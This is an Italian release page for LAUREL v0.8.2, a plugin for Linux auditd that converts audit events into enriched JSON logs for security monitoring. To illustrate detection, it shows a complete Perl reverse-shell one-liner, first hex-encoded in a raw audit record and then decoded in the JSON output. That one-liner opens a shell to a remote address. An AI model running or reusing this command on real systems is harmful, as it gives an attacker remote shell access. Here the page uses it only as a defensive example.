Torna agli aggiornamenti
New releaseJul 17, 2026

laurel v0.8.2

Trasforma i log di audit Linux per l'utilizzo SIEM

Condividi

logo

Linux Audit – Logging utilizzabile, robusto e semplice

Build Status

LAUREL è un plugin di post-elaborazione degli eventi per auditd(8) che genera log di audit basati su JSON utili e arricchiti, adatti per configurazioni moderne di monitoraggio della sicurezza.

La documentazione corrispondente all'ultima release stabile può essere trovata qui.

Perché?

TLDR: Invece di eventi di audit che assomigliano a questo…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

LAUREL li trasforma in log JSON dove il pasticcio che gli attaccanti/penetration tester/red teamer stanno cercando di fare diventa evidente a prima vista:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Questo accade alla fonte perché LAUREL viene eseguito sull'host dove vengono generati gli eventi di audit. Gli eventi vengono arricchiti con informazioni utili sul processo padre (ppid):

"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentazione

I dettagli di configurazione e operativi sono descritti nella pagina di manuale laurel(8). I dettagli sul formato del log e le motivazioni si trovano nella pagina di manuale laurel-about(7). La pagina laurel-audit-rules(7) contiene consigli ed esempi per configurare regole di audit utili per rilevare le tattiche degli attaccanti.

Le istruzioni di installazione di LAUREL contengono indicazioni su come compilare LAUREL dal sorgente e su come installarlo e configurarlo.

Abbiamo sviluppato LAUREL perché non eravamo soddisfatti delle caratteristiche e delle prestazioni dei progetti e prodotti esistenti. Si prega di fare riferimento al documento Performance per i dettagli.

Vedi anche

Licenza

GNU General Public License, versione 3

Autori

Il logo è stato creato da Birgit Meyer <[email protected]>.

Categorie